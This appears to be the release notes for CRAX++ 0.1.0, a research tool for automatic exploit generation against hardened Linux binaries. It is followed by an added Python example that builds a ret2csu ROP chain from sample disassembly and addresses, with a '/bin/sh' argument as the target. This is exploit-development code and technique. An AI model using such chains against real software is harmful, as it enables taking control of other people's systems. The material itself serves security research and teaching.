Releases: SQLab/CRAXplusplus

0.1.0

06 Feb 10:04
0.1.0 Pre-release

What's new in 0.1.0

  • Capable of generating exploits targeting Linux x86_64 binaries protected by ASLR + NX + PIE + stack canary.
  • Combines ROP formulae with a constraint solver to generate the ROP chain
    • Each exploitation technique comes with a ROP formula.
    • A ROP formula is essentially a vector of symbolic expression trees.
    • These symbolic expression trees are fed to the solver to obtain a concrete input.
    • The concrete input (if the solver can compute one) is used as the ROP subchain, which performs stack pivoting.
  • Built-in Modules:
    • I/O states (originally developed by Balsn CTF Team)
    • Dynamic ROP (incomplete)
  • Built-in Techniques:
    • Ret2csu (parses the instructions in __libc_csu_init() and generates the corresponding ret2csu ROP subchain)
    • Basic/Advanced stack pivoting (the advanced one requires a call site of read@libc and a leave ; ret gadget)
    • GOT partial overwrite: a technique that overwrites the least significant byte of GOT['read'] and spawns a shell via a syscall gadget.
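
The ret2csu technique listed above depends on which callee-saved register each argument register is loaded from inside __libc_csu_init(), and that differs between glibc versions, which is why the chain has to be derived from the actual instructions. The following is an added example, not CRAX++ code, showing that derivation in a small Python ROP-chain builder: the gadget disassembly, gadget addresses, the GOT entry and the "/bin/sh" address are all constructed sample data (assumptions for the example), and the post-call loop check is assumed to be the standard `add rbx, 1 ; cmp rbp, rbx ; jne`.

```python
# Added example, not CRAX++ code: derive a ret2csu ROP subchain from the
# disassembly of the two gadgets at the end of __libc_csu_init(), so that the
# chain is correct whichever callee-saved register each argument register is
# loaded from. All addresses and disassembly text below are constructed
# sample data for this example, not taken from a real binary.
import re
import struct

# Constructed sample disassembly of the "call" gadget in a newer glibc layout.
CSU_CALL_NEW = """
mov rdx, r15
mov rsi, r14
mov edi, r13d
call qword ptr [r12 + rbx*8]
"""

# The same gadget in the older layout: the argument registers come from
# different callee-saved registers, so a hard-coded chain would be wrong.
CSU_CALL_OLD = """
mov rdx, r13
mov rsi, r14
mov edi, r15d
call qword ptr [r12 + rbx*8]
"""

# Constructed sample disassembly of the "pop" gadget (same in both layouts).
CSU_POP = """
pop rbx
pop rbp
pop r12
pop r13
pop r14
pop r15
ret
"""


def canon(reg):
    """Map a 32-bit register name to its 64-bit parent (edi -> rdi, r13d -> r13)."""
    if re.fullmatch(r"r1[2-5]d", reg):
        return reg[:-1]
    if re.fullmatch(r"e[a-z]{2}", reg):
        return "r" + reg[1:]
    return reg


def parse_pop_gadget(disasm):
    """Return the registers popped by the gadget, in stack order."""
    order = []
    for line in disasm.strip().splitlines():
        m = re.match(r"pop\s+(\w+)$", line.strip())
        if m:
            order.append(m.group(1))
    return order


def parse_call_gadget(disasm):
    """Return ({arg_reg: source_reg}, (base_reg, index_reg)) from the mov/call lines."""
    arg_src = {}
    target = None
    for line in disasm.strip().splitlines():
        line = line.strip()
        m = re.match(r"mov\s+(\w+)\s*,\s*(\w+)$", line)
        if m:
            arg_src[canon(m.group(1))] = canon(m.group(2))
            continue
        m = re.match(r"call\s+(?:qword\s+ptr\s+)?\[\s*(\w+)\s*\+\s*(\w+)\s*\*\s*8\s*\]$", line)
        if m:
            target = (m.group(1), m.group(2))
    if target is None or not {"rdi", "rsi", "rdx"} <= set(arg_src):
        raise ValueError("not a recognisable __libc_csu_init call gadget")
    return arg_src, target


def build_ret2csu_chain(pop_gadget, call_gadget, pop_disasm, call_disasm,
                        fptr_addr, rdi, rsi, rdx, next_addr):
    """Return the ret2csu subchain as a list of 64-bit words.

    fptr_addr is the address of a memory word holding the function pointer to
    call (for example a GOT entry); the gadget does call [base + index*8], so
    base = fptr_addr and index = 0. After the call, the original code runs
    'add rbx, 1 ; cmp rbp, rbx ; jne' (assumed standard layout), so rbp = 1
    ends the loop; then 'add rsp, 8' plus six pops consume 7 words before the
    final ret transfers control to next_addr.
    """
    pop_order = parse_pop_gadget(pop_disasm)
    arg_src, (base, index) = parse_call_gadget(call_disasm)
    regs = {index: 0, "rbp": 1, base: fptr_addr,
            arg_src["rdi"]: rdi, arg_src["rsi"]: rsi, arg_src["rdx"]: rdx}
    chain = [pop_gadget] + [regs.get(r, 0) for r in pop_order]
    chain += [call_gadget] + [0] * 7 + [next_addr]
    return chain


def pack_chain(words):
    """Serialise the chain as little-endian qwords for an x86_64 stack."""
    return b"".join(struct.pack("<Q", w) for w in words)


if __name__ == "__main__":
    # Constructed addresses: the two gadgets, a GOT entry, a "/bin/sh" string
    # in .bss, and the address the chain continues at after the gadget returns.
    words = build_ret2csu_chain(0x40118a, 0x401170, CSU_POP, CSU_CALL_NEW,
                                fptr_addr=0x404018, rdi=0x404060, rsi=0, rdx=0,
                                next_addr=0x401040)
    print([hex(w) for w in words])
```

Running the same call with CSU_CALL_OLD instead of CSU_CALL_NEW moves the rdi value from the r13 slot to the r15 slot of the chain, which is the difference a fixed template would get wrong.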